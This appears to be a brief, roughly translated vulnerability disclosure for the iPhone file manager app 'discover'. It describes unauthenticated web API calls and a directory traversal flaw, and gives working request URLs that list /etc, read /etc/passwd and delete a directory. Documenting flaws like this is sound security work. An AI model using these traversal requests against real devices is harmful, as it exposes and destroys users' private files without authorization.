discover is an iphone/ipod touch platform on the popular file Manager, can read pdf/office/txt format files
And via wifi to share these files, a detailed description look at this: http://itunes.apple.com/us/app/discover/id292416855?mt=8#
When the wifi environment of the iphone/ipod touch users open the discover, it will automatically turn on remote web Access, the web interface is flash-made file management interface as in the following figure, and discover there are two directories: Private and Public, in the“settings” - >“file security settings”you can set web Access Password Authentication Type for HTTP Digest, but only to protect Private directory.
Due to discover a web Service of some of the api interface does not strictly authenticate the user to access and there is a directory traversal vulnerability, an attacker use the web Services api can access iphone/ipod mobile user permissions on any directory with the file, and you can remove mobile permissions to delete the file.
1, First of all we have to list the directory: http://192.168.1.9:8888/list?sort=%27&format=xml&dir=/Public/../../../../../../../etc/&order=asc
2, The Read file contents, although I know that our permission is only for mobile, but Read access is still very wide: http://192.168.1.9:8888/web?path=history/../../../../../../../../etc/passwd
There is also a delete api: http://192.168.1.9:8888/delete?path=/Private/&format=none